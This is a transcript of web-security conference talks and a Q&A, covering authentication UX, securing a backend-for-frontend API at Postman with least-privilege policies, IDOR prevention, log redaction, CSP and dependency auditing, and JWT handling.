In addition, if you have compliance and legal obligations, keep in mind that when you use third-party monitoring services, the user's data no longer stays with you — it goes to somebody else. You may need to talk to your lawyer if you're a big company; we're a tiny one, we don't have a lawyer. Use standard HTTP error codes, too: your analytics and monitoring software has sensible default behavior when you use proper codes. There's a famous article about this: if you enter a wrong username or password on Stripe or GitHub, they say "username or password is incorrect" without telling you which one — but you can go to the signup form and check whether the username exists anyway. Not revealing which field was wrong only has a benefit if there is no easy way to find out whether the username is valid, and on most web applications, trying to sign up will tell you. So you're not reducing the attack surface by hiding it — you're just confusing the user. We did this, and we ended up in a situation where people couldn't log in: we'd call the user up — "why can't you log in?" — "I just can't" — and they couldn't describe anything beyond that. So now we make it a point that as long as an error makes sense to a layman, we pass it on — messages that are specific, not raw "the server failed" noise. It also helps us debug production errors better. Next, third-party authentication with services like Google and Facebook: since Cambridge Analytica, they've been cleaning house a lot, and this keeps happening. A current example from Disqus: login with Google there broke, because Google disabled certain Google+ profile scopes. If you just need login, don't take any scope beyond the basic profile. When you need extra information later, do another loop through the provider, so the signup cycle doesn't break. Plain sign-in with Google is very seamless, but ask for extra permissions up front and you get a consent page — and from our data (we have 20-30,000 users, so not a lot of data) we've seen a lot of drop-off at exactly that page. If you ask for extra profile scopes, people don't grant them; it's very common. If you just need to log in, just log in — most of these providers ask for nothing extra during login — and if you need other things, do it later. Common stuff: try to stay generic; don't build overly specific one-off cases.
Then there's deduplication, which we've been trying to figure out in a lot of ways. You need to keep two situations separate in your mind: somebody deliberately creating a new email account to log in again is different from somebody who mistakenly created two accounts — one with Facebook login, one with Twitter login. So sometimes you need to let people merge their accounts. And if your business case depends on identifying a user so they can't use two accounts to double-dip on coupons or benefits — it's India; forget it. That's not going to work. People will create multiple accounts, and if the business model depends on stopping them, I don't think it'll work out. Finally: secure it even from yourself. This is very, very important. Your development team will grow — it starts with one person, a founder, a CTO, then it's ten people, twenty people. From day one, keep a copy of your database, run a cron job that anonymizes all the data, and develop and debug against the anonymized database. It's a good practice to have from day one; later on, it's hard to retrofit. Second point — and I don't know how many people will agree — our system is completely open source, and that has helped make it a lot more secure, because every time we commit and push, we know the world is going to see that code. So we double-check, twice over, that there's no security flaw in it. Our closed-source products — there are only two or three — are much more insecure than the open-source one; that I can say for sure. So, to summarize: keep these two things in mind. A lot of people say that making things secure reduces the experience. It does not reduce the experience of the user — but it definitely reduces the experience of the developer. You'll create a lot of barriers for yourself when you make your system secure, but that's a cost on you, not on your users. Nice UX plus security is entirely doable. And just follow the security practices you've known from the beginning. I'll end my presentation with a nice joke — you may have seen it on Twitter. One guy complained to T-Mobile Austria that a call-center agent verified his password over the phone. That means the agent has access to his password, which means it's probably stored in plain text. Also not case-sensitive — "wait, it's not?" It doesn't end there. T-Mobile replies that customer service can only see the first four characters — "but we store the whole password, because we need it to log you in." Of course. They go on: you have so many passwords, for every app, for every email account — "we secure all data very carefully, so there is nothing to fear." And somebody asks: what if your infrastructure gets breached and everyone's passwords are published in plain text to the whole wide world? Reply: "What if this does not happen, because our security is amazingly good?" It still doesn't end. The guy has a comeback: nobody's security is that good — not even yours. T-Mobile Austria replies: "Do you have any idea how telecommunication companies work?"
"Do you know anything about our systems?" As it turned out, the guy did have experience working with telecommunication systems. So don't be T-Mobile Austria. Security is something we should always keep learning; take advice wherever it comes from, and do your own research. I don't think anybody knows everything about security — we're all learning every day. For building this system, my inspirations were the Stack Exchange network, which has a very nice two-layer SSO system — one login works across all of their many sites — and HasGeek's own Lastuser system, which I studied a lot; but I'm not comfortable with Python, otherwise I'd have used it, so I wrote my own. And two people I'd like to thank: Jared Hanson, chief architect at Auth0 — without his libraries, a lot of this would not have been possible — and Eran Hammer, author of OAuth 1.0, who wrote a very long blog post criticizing OAuth 2.0; reading it is how I figured out which parts of OAuth 2.0 are useful and which aren't. Thank you. If you want to see the source code of the system I've been describing, it's at github.com/coding-blocks/oneauth; to see it in action, go to account.codingblocks.com; and follow me on Twitter. — That was a nice talk, with the nice stick figures. I think everyone might be exhausted from all the security and authentication since morning, so let's take a break: socialize, have some coffee, and come back by 11:40, because we have a — spoiler — talk about BFFs. — Hope you had a good break. Our next speaker is Ankit Muchhala. He's a foodie — he hunts down good restaurants and good food — so if you need food decisions, he can help. His talk is about securing a BFF; I don't know what that is, so let's hear it from Ankit. — Hello. I hope I'm audible — oh, this is too loud. Okay. Hey everyone, I'm Ankit Muchhala, and today I'm going to talk about building a secure BFF, which unfortunately stands for backend for frontend, and not best friend forever. Back in the day — and in many companies, still today — people built services that were complete in themselves: huge servers handling everything — authentication, user and team information, all of it. Clients connect to these servers, which have their own database, and the server handles everything and returns the information. These are termed monoliths, and over time they become difficult to maintain, with comparatively slow release cycles. So people started breaking the monolith down into smaller services called microservices. Each service — say, authentication or user — is broken out into a separate server with a well-defined business domain: you operate in this domain, and you expose only the functions that modify this data. But the problem now is that instead of connecting to just one server, the client has to connect to ten or twenty different servers, depending on how many microservices you have, and act as the orchestrator of everything — which is much less performant. To alleviate that problem, backend-for-frontend servers, or gateways, came along.
These are just API gateways designed to act as an interface between the client and a back end made up of multiple internal services. They sit in between and aggregate all the information, so the client again has just one server to talk to. The BFF abstracts all the internal implementation details of your servers and services away from the client, and it's more performant: it reduces network chatter, with fewer HTTP calls and less network overhead. But a BFF brings with it a different kind of security problem, and various security concerns. What can we think of, off the top of our heads? It's a single point of failure — and by extension, a BFF is a single point of attack. It has to be a public-facing service, since it's open for everyone to reach, so you have to implement authentication mechanisms. You'll also be dealing with user input, so you'll have to validate it. All of these concerns are pretty ad hoc — so is there a generic way to quantify them for an API, in our case a BFF? It turns out there are broad parameters for evaluating the security of any given system, and most of you will already know them. First, confidentiality: the data is available only to authorized users and doesn't leak to anyone unauthorized. Then integrity: the data is not tampered with by unauthorized sources. And finally availability: the data is available to authorized users when they want it — you're able to access the things you're allowed to, as and when you please. These parameters give us broad thinking silos under which we can reason about the security of an API, specifically a backend for frontend. To understand the BFF better, let's break the entire service down into four individual modules — service, inbound, platform, and outbound. We'll talk about these individually, see how to secure each module, and think about how they all combine. Along the way, I'll also tell you what we did at Postman to build a secure backend for frontend for our web application. Let's start with service, where all your server-side logic resides — where your controllers and the business logic of the BFF live. A request hits this module first, and you'd think that means performing some sort of validation here. But not all validation can be performed on a BFF: only ecosystem-level checks should run on such a service. Those include checking whether the request carries valid authentication, whether it has the proper structure, and maybe sanitizing certain headers. All the business-logic-specific checks — say, can this user comment on this specific document? — are handed over to the specific microservice responsible for that case. For some of these validating functions, you might be calling third-party services or your own internal microservices — for example, to check auth you might call Auth0, or whatever identity provider, to verify whether the given request is authenticated. All the services called before a request hits your business logic constitute the critical path, and the length of that path gives you a rough estimate of how complex the validations on your BFF are. It's generally a good idea to keep it short, and to have fallbacks for the non-essential services, keeping your BFF more available and at the same time more performant.
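A sketch of ecosystem-level checks on a BFF's critical path, assuming Express (the authService and flagService clients are hypothetical; only generic checks live here — business rules stay in the microservices):

```js
const express = require("express");
const app = express();

async function checkAuth(req, res, next) {
  try {
    // Essential critical-path call: if this fails, the request fails.
    req.user = await authService.verify(req.headers.authorization);
    next();
  } catch (err) {
    res.status(401).send("Unauthorized");
  }
}

function checkRequestShape(req, res, next) {
  // Ecosystem-level structure check: write requests must carry JSON bodies.
  if (["POST", "PUT", "PATCH"].includes(req.method) && !req.is("application/json")) {
    return res.status(400).send("Bad Request");
  }
  next();
}

async function attachFeatureFlags(req, res, next) {
  try {
    req.flags = await flagService.fetch(req.user.id);
  } catch (err) {
    // Non-essential service: fall back to defaults, keep the BFF available.
    req.flags = {};
  }
  next();
}

app.use(checkAuth, checkRequestShape, attachFeatureFlags);
```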
But how do you write these validating functions — the red blocks on your screen? This is where the principle of least privilege comes in very handy: for any action a user wants to perform, you give only the minimum required. That means you start off by giving no permission at all, assume the user is not allowed to do this, and then allow the action only under very specific conditions. Let's take a very trivial example to understand this. You're building a function called hasAccess. It takes two arguments — the user and the owner — and its job is to check whether the given user has access or not. The first thing you should do in any such function is return false: by default, the user does not have access. Then start adding your cases one by one: is the user an admin? Okay, allow access. Is the user the owner? Then also allow access. Only for those two specific conditions do you allow the request to pass through; all other cases fall through to false. This is called a fail-early, or fail-first, approach to writing functions — to writing any sort of code, really. And it also protects against data corruption: say isAdmin isn't a boolean but undefined — it falls through and returns false, protecting your internal business logic against unauthorized, or even malformed, requests. Now, that was a very contrived example. Let's look at a much more involved one with a sample BFF, and see what we can do.
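The fail-first hasAccess function just described, sketched out (the user/owner shapes are illustrative):

```js
function hasAccess(user, owner) {
  // Specific allow cases only:
  if (user.isAdmin === true) return true; // admins may act
  if (user.id === owner.id) return true;  // owners may act on their own resources

  // Everything else — including a missing or malformed isAdmin — falls
  // through to the default: no access.
  return false;
}

hasAccess({ id: 1, isAdmin: undefined }, { id: 2 }); // => false, not a crash
```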
So here I am in a simple server with the kinds of routes any public service has: certain open views — the landing page, the signup page, login — which have to be open; certain dashboard pages that are only for authorized users; certain API endpoints; and finally certain redirects. Right now everything is open: I can refresh and reach everything, because in the functions that check for access, nothing is defined in this file. Now I write my validating functions — they might be middlewares, they might be accessor functions — and we always start the same way: for any route, for any endpoint you hit, return false. That's it, nothing else. Refresh: Forbidden. You start off with the maximum restriction — no endpoint in this API is authorized — and then you start relaxing constraints. For the entrance controller — the pages that are open to everyone — you allow everyone, because your website has to be visible. There you have it: I can click on Login, type my credentials, and sign in... but I still get Forbidden. The password was correct, the username was correct, but I haven't explicitly given permissions to signed-in users yet. So let's do that. For the dashboard, our signed-in pages, it's not a boolean allow-or-disallow answer: you say "check for login", and for that I've already written a helper method called isLoggedIn, applied to anything within the dashboard controller. I copy the same over for the account page: all logged-in users allowed. Refresh, log in again — and there we have it, our page. But when I try to go to the team section, I haven't explicitly given permissions — and you know the drill by now: for any new endpoint, any new route or set of routes, you start by applying the maximum constraints. For the team controller, apart from checking isLoggedIn, you also check isSuperAdmin — meaning all routes in the team controller are only allowed for admin users. But some of these should be available to everyone: team information should be visible to all users. So for that specific endpoint, info, we relax the constraint to just isLoggedIn. That's the drill: apply the maximum constraint — allow nothing — and relax only the specific endpoints where it's necessary. That way you're protected against a developer randomly adding an endpoint and forgetting to add the correct access control. And notice how the access control stayed separate from the business logic: I never touched my controllers; all I touched were my policies, the accessor functions. This highlights the bigger idea: use the architecture of your API as a forcing function — make it harder for your developers to be insecure. One way we do this at Postman is exactly this separation of business logic from access control; you just saw a tiny example of it. We also leverage our platform, our framework: at Postman we rely heavily on Sails.js, which is built on top of Express and provides the concept of hooks, whereby you can augment the framework itself to add functionality. We implement things like an auth hook that takes care of all the authentication requirements for a given API, and all of this is baked in whenever a new service spins up — so the developer starting to work on it doesn't have to worry about all the small intricacies where a mistake would be critical. It also comes with all the dependencies bundled in. Which brings up an important fact: you are not going to write all your code yourself. You'll reuse a lot of modules, from npm or yarn, and it's crucial to start off with strict versions for whatever dependencies you use. You verified your app and checked its security with, say, version 0.1 of the request module — you're guaranteeing security for only that specific version. It should not be deployed with 0.1.1, which may or may not have a security vulnerability you're not even aware of.
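Going back to the access-control demo: in a Sails-style setup, those policies live in one config file, something like the sketch below (controller and policy names follow the demo; the exact syntax varies by Sails version):

```js
// config/policies.js — access control kept separate from business logic.
module.exports.policies = {
  "*": false, // maximum constraint by default: every route is forbidden

  EntranceController: { "*": true },          // landing/signup/login stay open
  DashboardController: { "*": "isLoggedIn" }, // signed-in users only
  AccountController: { "*": "isLoggedIn" },

  TeamController: {
    "*": ["isLoggedIn", "isSuperAdmin"], // admin-only by default...
    info: "isLoggedIn",                  // ...relaxed for this one endpoint
  },
};
```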
So pin strict versions, and use lock files to prevent deep-dependency updates. But it's possible that the version you checked today is completely secure, and tomorrow a security researcher announces a huge vulnerability in it — so you also need to monitor continuously whether your dependencies are vulnerable. For that, there are tools like nsp, npm audit (which is built into npm), and Snyk, which we use for dependency analysis. Here's a sample `snyk test` run: it checks all your dependencies and gives me a report — "I found two issues; here's a medium-severity vulnerability, a ReDoS-type attack, introduced via such-and-such package, and here's what to do to resolve it." This is integrated into our CI pipeline and runs on every branch build, so even when a developer isn't aware of a vulnerability in a dependency, it gets caught easily and you can take the necessary steps. That was one way of enforcing security while building something. There are other ways we do it at Postman, and one very simple one that's often overlooked is linting for security. A quick example: here I have a link that opens externally, because it has target="_blank". This is unsafe, because the newly opened tab gets access to my current tab through the window.opener object and can redirect it anywhere, which is insecure. The linter catches this and tells you: this isn't allowed; add rel="noopener noreferrer" so the opened tab has no access to your current tab. These are very simple mistakes — extremely simple — easily caught by linting: target="_blank", eval, certain uses of the Function constructor. Catching them goes a long way toward securing your application. We also have system tests to ensure the configuration of critical packages: say you're using an auth package that has to be configured in a certain way — the system tests are extremely thorough, down to the last detail of whether that package was configured correctly, and any change in those system tests acts as a red flag for our code reviewer: something major was changed here; be very careful while reviewing. And finally, we have e2e tests for security, especially using Postman collections.
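As a concrete instance of linting for security, a minimal ESLint configuration might look like this (a sketch; it assumes eslint-plugin-react for the target="_blank" rule, and rule availability depends on your stack):

```js
// .eslintrc.js
module.exports = {
  plugins: ["react"],
  rules: {
    "no-eval": "error",         // no eval()
    "no-implied-eval": "error", // no setTimeout("string of code"), etc.
    "no-new-func": "error",     // no new Function("...")
    // Require rel="noreferrer" (implying noopener) on target="_blank" links.
    "react/jsx-no-target-blank": "error",
  },
};
```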
I wrote these tests here in the test script, saying that I should check for a specific response code. These tests can be much more complicated. What this means is that this is an actual failing test case, provided to me by anyone in my team, saying that hey, this is a bug, this is how you reproduce it, go ahead and fix it. So let's do that. The fix here is that instead of taking the user ID only from the path, we take it from the authentication mechanism. So for the account routes we verify that the user is logged in and, at the same time, has a valid user ID: this checks the user ID from the path and compares it with what we got from the authentication method. And when I try to run it, it should pass. So this is the cycle: you have a failing test case, you fix it, and you integrate this command, newman run collection (it just runs a collection), into a CI pipeline as a regression test. That makes it very easy for anyone inside our team, as well as people who are not part of the team building the BFF, to give us a failing test case that reproduces an issue and can be integrated into a regression-testing pipeline. Now, all we discussed so far was writing the code of the BFF, of an API, but a major chunk of a BFF is to talk to internal services, which is its core purpose, and the first hurdle there is handling authentication for internal services. Some of your services might have basic authentication, some might have token authentication, some might rely on cookies or anything else in the world, but all these things are abstracted away from the developer, and especially from the server-side code. Here's a sample snippet from one of our controllers (a sketch of the idea follows below). Instead of the developer manually specifying the base URL of the service and the authentication mechanism, all they do is provide the service name, which path to hit and what query to pass. This abstracts away all the information about authentication and about the internal implementation details of those servers, and it also prevents accidental leaks: when I query a service without this abstraction, there is a high chance of me either logging that internal auth mechanism or returning secrets via my API endpoint. It also allows for easier secret rotation, since your server-side code does not care about how you're authenticating; you can rotate your secrets without even touching your server-side code. And when you're dealing with all these services, authentication, as you have learned in the previous talks, is just not enough. You also have to validate whether a person is authorized to perform something. For that, we tag each request coming to our BFF and sent on to our internal microservices with a certain token. So here our BFF is adding a sample token; it might be an access token or a session token, which allows the internal service to identify who the user performing this action is and what other checks it needs to run. For example, only admins can remove users from a team, and this token allows the internal service to get the user information, check whether they are an admin or not, and allow or disallow based on that. This helps us prevent a major class of vulnerabilities which fall under the name IDOR, which stands for insecure direct object references.
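As a sketch of that controller-side abstraction: the serviceClient name, its options and the service names below are hypothetical, purely to illustrate the shape of the pattern, not Postman's actual module:

```javascript
// Inside an async controller action: the controller never sees base URLs,
// credentials or auth schemes. serviceClient (hypothetical) resolves
// 'user-service' internally and attaches whatever auth that service needs
// (basic, token, cookie, ...).
async function listTeamMembers(req, res) {
  const team = await serviceClient.request({
    service: 'user-service',   // logical name, not a URL
    path: '/teams/42/members',
    query: { limit: 20 },
  });
  return res.json(team);
  // Rotating user-service's secret is now an ops change, not a code change,
  // and no credential is in scope here to leak into logs or responses.
}
```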
IDOR happens when you expose internal object references, let's say auto-increment IDs, along with incorrect or inappropriate access-control checks. We saw an example of this when I demonstrated user 4 trying to access user 2's information. Here it's the same example: the user is authenticated as ID 123, but since the API does not have valid checks, I was also able to obtain user 124's information, and an attacker can enumerate through all these keys, and there you go, you have just had a major breach. So every user action needs to be validated against the token you have passed. In this case, that means verifying that the user ID in the query path is exactly the same one we get from the token, preventing this issue. And apart from preventing user leaks, you will also be logging a lot of things, because this is a BFF: it talks to so many internal microservices, and you might need to log for analytics or, let's say, for debugging purposes. Since you might be dealing with user-sensitive information (maybe the password, email, maybe credit card information), you have to scrub your logs for sensitive information. Of course it is expected of developers not to log information which is considered sensitive, but we also have heuristic functions in place which redact certain information from the logs (sketched below). So here we have a service A which is trying to log the authentication, that is, the token ID, but our heuristics detected that, hey, an access token is being logged, and redacted it completely. This also allows us to trace our logs throughout our internal network: we attach a trace ID to the request originating from the BFF and then trace it throughout our internal microservices infrastructure, giving us a track of potential PII movements (personally identifiable information). Since this is a user service, any service you call might also be dealing with user information, and you need to check that they are also in compliance with the rules and regulations you follow. So this was all about building your server-side code: you wrote your logic in a certain language and talked to internal microservices using certain practices, but at the end of the day you have to return all these results to the client, and this is where our traditional security terms come in: HTTPS, CSP, SRI. I'm going to skip over most of that and just talk about two specific, interesting things we learned while building a BFF at Postman, the first of them being HTTPS. When switching to HTTPS you will always be choosing a type of certificate. Your cloud provider might be giving you a default certificate, and you can also obtain a free certificate from services like Let's Encrypt. These provide domain validation: such certificates ensure that the data served is really coming from the domain you are seeing in the URL. However, they do not validate the intent of the content, so you can be served malicious content over a secure channel.
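As a sketch of such a redaction heuristic: the key names and matching rules here are assumptions, since the actual functions at Postman are not public:

```javascript
// Recursively redact values whose keys look sensitive before logging.
const SENSITIVE_KEY = /(token|secret|password|authorization|card|cvv)/i;

function scrub(value) {
  if (Array.isArray(value)) return value.map(scrub);
  if (value && typeof value === 'object') {
    return Object.fromEntries(
      Object.entries(value).map(([key, v]) =>
        SENSITIVE_KEY.test(key) ? [key, '[REDACTED]'] : [key, scrub(v)]
      )
    );
  }
  return value;
}

console.log(scrub({ userId: 123, accessToken: 'eyJhbGci...' }));
// -> { userId: 123, accessToken: '[REDACTED]' }
```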
If you want to instill more trust in your users, say you are building a very critical payment service, you might opt for extended validation certificates, wherein your organization is also validated by the certifying authority and the user is shown more information saying that this company was verified. And when you are transitioning to HTTPS, please ensure, and constantly monitor, that all your requests are over HTTPS and are not falling back to an insecure channel. Finally, once you have verified that everything is done, you can opt in to something stricter, HSTS, saying my service is only allowed over a secure channel. Be very careful while doing this: if you ever want to downgrade to HTTP for something and you have preloaded into browsers, it will be very, very difficult to fall back. Now, once you have served secure content and assured the user that it hasn't been tampered with, you also want to ensure that only specified things are allowed to execute in your application. This is where Content Security Policy comes in. It provides a whitelist saying only allow things from these sources to execute, and don't allow anything else. When you start implementing CSP, always start in report-only mode; it helps you a lot. In this mode CSP won't block anything; it will just report to a URI you provide, saying that hey, these violations were observed, and then you won't have to worry about side effects (a sketch of such a header follows below). For example, you might be using services like Google Tag Manager, which inject JavaScript dynamically, and you might break your entire analytics pipeline if you blindly disable all inline JavaScript. And finally you need to understand that CSP isn't an ideal defense against data exfiltration: once there is malicious JavaScript in your application, you cannot rely solely on CSP to prevent misuse of that data. For example, link hrefs are not covered by CSP. There is a whole plethora of other security headers which you can refer to, picking and choosing what suits your needs. But among all these jumbled words and headers, one thing that stands out as extremely crucial is that all of these checks depend on the browser the client is using. If a browser does not support CSP, all your fancy rules are going to go down the drain, and they are definitely not a replacement for careful input validation and output encoding. You have to be very careful while taking an input to your server, sanitize it, and do the exact same when you are showing it to the user. And this completes building our application layer. We built everything securely: we took care of internal validation, of outbound traffic talking to internal services, and of showing it to the client. But we are going to serve all these things over a platform, be it AWS, Azure or DigitalOcean, and since you are not exactly building a server from scratch, from actual hardware, you are configuring certain third-party services, which means that you have to have constant audits and automation to protect your cloud infrastructure.
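A minimal sketch of rolling out CSP in report-only mode, here as hypothetical Express middleware (the policy and the report endpoint are placeholders, not Postman's actual policy):

```javascript
const express = require('express');
const app = express();

// Report CSP violations without blocking anything yet. Once the reports stop
// showing legitimate traffic (e.g. Google Tag Manager scripts), the same
// policy can be promoted to the enforcing Content-Security-Policy header.
app.use((req, res, next) => {
  res.setHeader(
    'Content-Security-Policy-Report-Only',
    "default-src 'self'; script-src 'self' https://www.googletagmanager.com; report-uri /csp-reports"
  );
  next();
});
```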
So what do you audit? You audit developer access, saying only a defined set of members are allowed to do certain things; you check configuration when you set things up, asking am I setting this up with the appropriate values, is it insecure in any way; and you also ensure that resources are created reliably over time. You are creating various instances, and you need to ensure that those instances are created reliably and securely every time. For that, at Postman we use our collection runs to create resources with extreme confidence: once we have guaranteed that we have created a database securely, a collection run guarantees that it will be secure in every future run. We also monitor these configurations continuously using our monitoring service, keeping track of what exactly happens, and if anything major is found missing or misconfigured, we are notified and take the appropriate steps. So let's take a look at how we perform one single audit with a collection. I'm back in the Postman app and I have a collection ready for you, an AWS MFA audit. This collection does one simple thing: it lists all the users in your AWS team and verifies that all of them have MFA, that is, two-factor authentication, enabled. So I just go ahead and run this collection, choose the appropriate environment and say run. This will call the AWS API with your access token and fetch the users. I hope the internet works... and it won't return, because if the internet does not work you won't be able to list users. But ideally, if you open the runner, you will have a result like this, which I have ready for you, and the last line tells me: Ankit_M should have MFA enabled. Which is exactly what I want: I want to verify that all users in my team have MFA enabled (a sketch of the test is below). This keeps running constantly, and if anyone does not have MFA enabled we get a Slack notification, we notify them, and everything is good. One other thing we ensure on our platform is health checks. Once your service is ready for deployment, and before it is served actual live traffic in production, we verify mission-critical information. This might be things like keys, environment variables, DB consistency, your cache consistency, all the things which might affect the availability of your service. In our applications we have a bootstrap test which performs all this, and if anything fails in this step we just bail out and prevent the deployment; if everything looks good, then yes, you are allowed to deploy. However, this is used as the last line of defense against major mishaps; it is definitely not to be used as a testing mechanism. So, we have talked about each of the components which go into building a secure backend-for-frontend: we started off with the service, handled validation inbound where we talk to our internal microservices, ensured that content was served securely to our clients, and also secured the platform which serves all these resources. But it's not a one-time thing where you do all of this once and forget it; you need to ensure that these things continue and your application stays secure over time, and that is where we follow certain methodologies to ensure that our services stay secure.
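The test behind that audit could be written along these lines: a sketch of a Postman test script, assuming the previous request in the collection returned the team's users with an MFA flag (the actual response shape of the collection is an assumption):

```javascript
// Postman test script: assert that every listed user has MFA enabled.
const users = pm.response.json().users || []; // response shape is assumed

users.forEach(function (user) {
  pm.test(user.name + ' should have MFA enabled', function () {
    pm.expect(user.mfaEnabled).to.be.true;
  });
});
```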
One of them is tracking security KPIs (key performance indicators), and one of those is the CVSS scores of the vulnerabilities we detect. We track them throughout our versions; we see how often we are repeating our mistakes, or whether we are repeating them at all, and how long it takes to fix an issue reported by users or by someone from our team. We also keep track of issues reported via services like HackerOne, where security researchers try to break your app, and these are tracked throughout our versions, giving us a very quantifiable metric of whether your BFF was secure, whether it has dwindled over time or become more secure. This is all handled in a step called VAPT, which stands for vulnerability assessment and penetration testing. This is a post-development step wherein, once a build is ready for production deployment, we send it to our security team. They perform certain tests on it, which might be white-box or black-box testing, and try to find vulnerabilities or security issues with the build. If they find any, they suggest changes to us, we make the changes and send it back again, and only once it is cleared by them is it allowed to go to production. This step exists in most companies and is a very tedious, very manual process, because the engineers have to manually keep track of all past bugs and retry them again, checking that you haven't regressed on something. But at Postman we automate all of this using our collection runs; as you just saw, I demonstrated three different ways to check for various things. For any bug you find, let's say a user information leak, a collection is created and is automatically run whenever a build reaches the security step, making the process much faster and more reliable and eliminating human error. And all these things, building a secure platform, a secure API layer, and following proper software methodologies, add up to building a secure API, or a BFF in this case. If you remember, we started off with certain security parameters, saying we want to evaluate the security of our BFF under those parameters. So what did we do to achieve them? To achieve confidentiality, we ensured proper validation using the principle of least privilege, and we scrubbed our logs using various heuristic methods. To ensure integrity, we made sure that every request was tagged with user information, so that we prevent IDOR attacks and leaking information about other users, and we also implemented content security using various headers. And finally, to ensure availability, we kept our critical path extremely short, meaning our BFF is much more performant, and we performed constant platform audits and consistent health checks to ensure that a bad release isn't pushed out to users. All these things combine to build a secure API in general, and this is what you need to take care of while building anything. Your needs might be different from our needs: certain things felt right for us, and we had a certain use case in mind, but your API or your BFF might not have those constraints or the same use case. What you need to understand is which security considerations you need to take care of while building each module of your API, keeping in mind that it is a gradual process. You can't wake up one day and say, today I'll make my API secure; it's not going to happen in a day. It will happen over time, where you
constantly monitor things, measure things and ensure that your API remains that way throughout the period of time. And finally, it is very philosophical to say that security should be ingrained in you, but small mistakes that you make, like using eval or using unsafe links, go a long way in destroying the security of an application. So while developing, make sure you take care of these small mistakes, you ingrain security as a part of your development process, and you don't wait for QA or security engineers to tell you that this is wrong. That goes a long way in building a secure and also reliable backend-for-frontend. Thank you very much. Do we have time for questions?

Let's have a joint Q&A. Oh yeah, there's a joint Q&A. So, the first four speakers, Siddharth, Arnav, Shyam: this is a joint thing, obviously, where you can ask whatever you have and any of the four can answer. We have runners here who will hand over the mics. So if you have any questions for the four of us, you are free to ask at this point.

Hi Shyam, considering all the talk about security: as users of a website or of an app, apart from ensuring it's HTTPS and everything else, what are the other things we can look for before trusting a website with our credentials?

So you're talking about you trusting a different website with your credentials? Yeah, as a user, not as a developer. Good luck with that. If you figure it out, let me know, because other than relying on the company, their background and how many people they have, I haven't found a good metric, and even the best of websites, the LinkedIns and the Googles of the world, have had leaks at different points in time. So, simple things to do: minimize the information you give, use single sign-on via some other provider that you trust, and don't reuse your passwords. Other than that, I have no better tips; maybe one of you guys does.

Hello. My question is for Siddharth, about security and especially JWTs. Everything you write on the client side is in JavaScript, and if you want any token you have to handle it in JavaScript. How difficult is it to parse the JavaScript in the browser itself and get all the information?

Um, are you asking how difficult it is to capture the token on the client side? It's super easy. If you use a Chrome extension or a vulnerable npm package, you should always assume that the client-side token is already gone.

So when you talk about JavaScript and security, when everything is written in JavaScript, how can we make it secure?

Okay, I can give you a one-minute revision of my talk, because that's basically my talk. The idea is that in the token you don't store anything that you don't want people to see. So no credit card information, no passwords, no cart information; only store things that are required for the session. Who is this person, what's their ID, admin or user role, et cetera. The goal with JSON Web Tokens is not to hide that information; it is to verify that this information is legit. It comes from the server to the client and goes back to the server, and the goal is to make sure that it's not tampered with in between. If it's tampered with, you'll get to know; that's the thing it tries to solve. So it's not hidden.
It's just, uh, verified.

I guess my question is why a man in the middle cannot get my private key when I'm sending it back. While authorizing, the idea is that I'm sending my private key privately to my client.

No, no, never, never, please don't do that. You only use the private key on the authorization server to create a token, and then you only pass that token. The token has a signature which was created with the private key, but you don't pass the private key; you only pass the token.

So let me rephrase: in the shared-key system, where the key is available to both, what happens then?

Okay, it's like saying you and I have a secret, right? We have a pseudo-language that we've created between ourselves. Now, you're the authorization server, I'm the API server, and he's the client. We can talk in our own code language and he wouldn't understand, because he doesn't have the shared secret. You would understand because you have the shared secret, and when you say it to me, I can understand because I have the shared secret. But while we talk in this room, even though other people can listen, they don't have the shared secret, because it doesn't go through the client. It only stays with you and me. The secret is never in transit. You have built both the servers, right? So you just keep the secret in both places. It's never in transit; it doesn't travel through the client.

This is regarding how we build front end and back end in our systems right now. When we use JWTs, we have to store them on the front end in order to access the session at a later point, right? One way is, like you said, local storage; another way is storing it in a cookie. When storing it specifically in a cookie, one way to secure it is, of course, to sanitize whatever information I receive; another is to set an expiry date on it; and also setting HttpOnly to true. These are ways I can secure my cookie, but is that enough to secure storing a JWT in a cookie, or should we do more on top of that?

I guess he can answer your question about cookies. Right? I can answer that. Sure. I can answer the local storage part, or the in-memory part, again: because you use a bunch of npm packages and a bunch of client-side Chrome extensions, they can hypothetically grab your token as well. That's why you should always assume that the token is going to get leaked, and all of these things we talk about, setting the audience, using the right algorithm, setting expiry, are only frictions that you add so the attacker has to do more work. The more friction you add, the more difficult it becomes, but I wouldn't say it will ever be foolproof.

I would add a very general point: with something like cookies, just set it, knowing that anybody can read the cookies, but beyond that, be wary of trying too much extra stuff. For example, there is the X-XSS-Protection header field that you set on HTTP. It's supposed to remove a vulnerability on other browsers, but it actually introduces a vulnerability on IE 8, because zero and one are swapped on IE 8. So don't do a lot of extra stuff just to make things extra secure, especially on the client side. Just assume the client is already exploited; don't try ten different things.
You'll probably introduce some extra vulnerability if you try something fancy on the client side.

Is there a way to invalidate a JWT other than the expiration time?

Then it won't remain stateless: you would maintain a blacklist for that. Or you can change the private key, and then everybody is logged out. These are the two ways that we usually do it. Any other way? You can use them like cookies and store them server-side, but if you want server-side logouts, then JWT is not your option. JWT has an application-layer kind of niche where it is very useful. Like I was mentioning in my talk, we use JWTs a lot in our applications, but we don't use them for sessions on our server, because there are places where you want to do a server-side logout, and you probably don't want to use JWT there.

So, about invalidating the JWT, or reworking the token: I'll tell you a basic example scenario. We have a customer already logged in, so on his local system we have the JWT, and from the admin side the customer's status is changed to no longer valid, but the token is still stored on his local system, right? So he will still be able to access things. How can we handle this situation with JWT?

I guess the first part of it was covered by invalidating JWT tokens, but the second part is about what you store in a token. These transient states, like whether the user is active or not, or whether the user is allowed to do something or not: should you really store them there? If you can, handle it on your back end, store it in your database and check there, so you don't have to invalidate the token. The state of the user has changed from, let's say, active to inactive, or maybe deprecated or whatever. So you provide a way for the user to say, I am this person, here are my claims, but on the server you figure out what the state of this user is, rather than pushing everything to the client side.

I'm just going to say everything in one sentence: if you want remote logout, don't use JWT, don't use stateless sessions. You want something that is stateful; either use a cookie or use the JWT like a cookie.

One more general question to you guys, just to clear your minds. Say you have a JWT and you have the username inside it, and say your server allows changing usernames. Now the user changes his username and you get an incoming JWT. It's valid, of course it's valid, it's not expired. So if you look at the username, which one would you use as the source of truth: the database or the JWT? I hope that answers the query for everybody. Right: the JWT should not be the source of truth, and it should only carry very nominal identifying data. If some data has changed in the database, then your source of truth has changed, and that is another way in which your JWT is actually not valid anymore.

